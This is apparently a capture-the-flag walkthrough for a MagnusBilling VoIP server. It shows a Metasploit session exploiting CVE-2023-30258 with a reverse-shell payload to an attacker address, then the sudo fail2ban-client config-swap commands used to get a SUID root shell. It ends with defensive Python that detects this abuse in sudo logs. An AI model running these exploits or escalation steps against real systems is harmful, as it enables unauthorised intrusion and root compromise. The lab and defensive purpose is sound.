The following post by 0xb0b is licensed under CC BY 4.0
Recon
We start with an Nmap scan and find four open ports. Among them are a web server on port 80, a MariaDB service on port 3306 and an Asterisk Call Manager on port 5038.
From the default script scan, we can also see the content of robots.txt, which has a disallowed entry for the /mbilling directory.
We visit the directory and are presented with a login page; the page title also shows the name MagnusBilling.
http://billing.thm/mbilling/
A short search shows that MagnusBilling is an open-source VoIP billing and management system for managing SIP trunks, VoIP calls and customer billing. It provides tools for call routing, monitoring and invoicing.
Shell As asterisk
MagnusBilling is affected by an unauthenticated remote command execution vulnerability, CVE-2023-30258, for which a standalone exploit exists and which is also covered by a module in the Metasploit framework.
We set up the exploit in the Metasploit framework and give it a try.
└─$ msfconsole
Metasploit tip: Use the analyze command to suggest runnable modules for hosts
=[ metasploit v6.4.0-dev ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search magnus
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.14.90.235
LHOST => 10.14.90.235
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOST billing.thm
RHOST => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
We get a shell and are the user asterisk.
We set up another listener and spawn a second reverse shell, since I am not very familiar with the Metasploit framework and would like to have an upgraded shell.
To upgrade the shell, we follow the instructions provided here:
We find another user, magnus, in /etc/passwd. We have access to that user's home directory and can read the user flag there.
Shell As root
As asterisk, we can run sudo -l without a password, and it shows that we are allowed to execute /usr/bin/fail2ban-client with root permissions.
Fail2ban is a security tool that monitors log files for suspicious activity and bans IP addresses after repeated failed login attempts. It protects servers from brute-force attacks by automatically adding firewall rules.
The following resource provides various insights into how this could be used to escalate privileges.
There you can find an approach that customizes a config in the configuration directory and places code in it that is then executed with root permissions. Unfortunately, we only have read-only access to the directory /etc/fail2ban and its contents.
But we can work around this: we copy the configuration directory and point fail2ban at the copy when we run it.
In the fail2ban-client command, the -c option specifies the configuration directory Fail2Ban reads its settings from.
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
With rsync -av /etc/fail2ban/ /tmp/fail2ban/ we recursively copy the contents of /etc/fail2ban/ to /tmp/fail2ban/ (the trailing slash on the source makes rsync copy the directory's contents rather than the directory itself, and -a preserves permissions and timestamps).
rsync -av /etc/fail2ban/ /tmp/fail2ban/
We can then follow the Exploiting Fail2Ban and Getting a Root Shell section of https://juggernaut-sec.com/fail2ban-lpe/ and customize action.d/iptables-multiport.conf before restarting the service, or write our own config.
With the following, we write our own config, which executes a script that copies /bin/bash to /tmp/bash and sets the SUID bit on it to obtain a root shell.
After running the script, we have a SUID binary at /tmp/bash and can execute it with the -p flag to get a root shell. We then find the root flag at /root/root.txt.
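From the defender's side, the staged-config trick above leaves a clear trace in sudo's log: fail2ban-client run as root with -c pointing somewhere other than /etc/fail2ban. The following Python is an added example, not part of the original post, that flags such invocations in sudo log lines (Debian-style syslog format is assumed) and reports sudoers rules that grant fail2ban-client without a password; the sample log and sudoers lines are constructed.

```python
import posixpath
import re
import shlex

# sudo's syslog line format on Debian-style hosts (assumed), one entry per line.
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$")
SUDOERS_RE = re.compile(r"^\s*(?P<who>\S+)\s+\S+=.*\bNOPASSWD:\s*(?P<cmds>.+)$")
TRUSTED_CONF_DIR = "/etc/fail2ban"

def config_dir_from(cmd):
    """Normalised directory a fail2ban-client command loads via -c DIR or -cDIR;
    None when the command does not name a configuration directory."""
    argv = shlex.split(cmd)
    if not argv or posixpath.basename(argv[0]) != "fail2ban-client":
        return None
    for i, arg in enumerate(argv):
        if arg == "-c" and i + 1 < len(argv):
            return posixpath.normpath(argv[i + 1])   # normpath folds "../" tricks
        if arg.startswith("-c") and len(arg) > 2:    # getopt's joined -cDIR form
            return posixpath.normpath(arg[2:])
    return None

def suspicious_fail2ban_invocations(log_lines):
    """(user, command) for each sudo run of fail2ban-client as root that points
    Fail2Ban at a configuration directory other than /etc/fail2ban."""
    hits = []
    for line in log_lines:
        m = SUDO_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        conf = config_dir_from(m.group("cmd"))
        if conf is not None and conf != TRUSTED_CONF_DIR:
            hits.append((m.group("user"), m.group("cmd")))
    return hits

def risky_sudoers_rules(sudoers_lines):
    """sudoers lines granting fail2ban-client via NOPASSWD: since -c lets the
    caller choose the config tree, a writable copy of it runs actions as root."""
    return [l.strip() for l in sudoers_lines
            if (m := SUDOERS_RE.match(l)) and "fail2ban-client" in m.group("cmds")]

# Constructed sample input (not taken from the original post).
SAMPLE_AUTH_LOG = [
    "Mar  3 10:14:55 billing sudo: asterisk : TTY=pts/0 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/bin/fail2ban-client status",
    "Mar  3 10:15:01 billing sudo: asterisk : TTY=pts/0 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/bin/fail2ban-client -c /tmp/fail2ban/ -v restart",
]
SAMPLE_SUDOERS = ["root ALL=(ALL:ALL) ALL", "asterisk ALL=(ALL) NOPASSWD: /usr/bin/fail2ban-client"]
```

The mitigation is the same check in reverse: do not grant fail2ban-client through sudo at all, or restrict the rule to the exact sub-commands needed so the -c option cannot be supplied.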